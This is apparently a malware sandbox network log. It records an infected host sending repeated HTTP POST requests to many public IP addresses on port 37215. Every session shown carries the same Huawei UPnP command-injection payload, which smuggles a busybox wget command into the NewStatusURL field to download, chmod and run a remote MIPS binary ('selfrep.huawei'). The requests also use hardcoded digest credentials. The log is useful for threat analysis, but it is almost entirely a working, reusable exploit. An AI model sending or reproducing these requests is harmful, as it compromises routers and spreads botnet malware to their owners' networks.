                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1192.168.2.1538384149.158.0.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506455898 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2192.168.2.1542160157.242.26.16437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506485939 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3192.168.2.1546146157.103.231.3237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506501913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4192.168.2.1553958157.14.47.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506675959 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5192.168.2.1545188157.71.219.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506675959 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6192.168.2.1543014157.27.192.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506700993 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7192.168.2.1547222195.174.185.1937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506721020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8192.168.2.1544842157.169.220.14037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506736040 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9192.168.2.1538338197.215.197.4137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506767035 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10192.168.2.154890470.18.22.7037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506767035 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 